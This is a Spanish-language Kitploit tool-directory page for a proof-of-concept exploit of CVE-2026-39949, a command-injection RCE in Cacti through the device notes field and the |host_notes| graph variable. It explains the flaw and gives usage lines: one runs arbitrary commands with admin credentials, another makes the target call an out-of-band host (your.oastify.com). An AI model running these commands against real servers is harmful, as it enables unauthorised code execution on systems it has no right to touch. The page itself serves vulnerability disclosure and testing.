Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-39949 — Cacti ≤ 1.2.30 Auth RCE - Inyección de variable host | Kitploit
Herramientas/GitHubGitHub/lukehebe/cve-2026-39949
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHublukehebe/cve-2026-39949

CVE-2026-39949

Cacti ≤ 1.2.30 Auth RCE - Inyección de variable host

Ver Repositorio
1hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-39949: Ejecución remota de código autenticada en Cacti mediante inyección de variables de host

Resumen

Una vulnerabilidad de inyección de comandos del sistema operativo en Cacti ≤ 1.2.30 permite a cualquier usuario autenticado con privilegios de creación de plantillas de dispositivos y gráficas ejecutar comandos arbitrarios en el servidor subyacente. La falla existe porque los campos de metadatos del host controlados por el usuario (específicamente el campo de notas del dispositivo) se sustituyen en los argumentos de línea de comandos de RRDtool mediante el motor de reemplazo de variables de Cacti sin ningún tipo de saneamiento o escape. Un atacante puede inyectar metacaracteres de shell en el campo de notas, crear una plantilla de gráfica que haga referencia a la variable |host_notes| y provocar el renderizado de la gráfica para lograr la ejecución remota de código completa como el usuario del servidor web.

Uso:

root@kitploit:~
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'

Ejecución de comandos OOB:

root@kitploit:~
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com
imagen
imagen
imagen
Descargar herramienta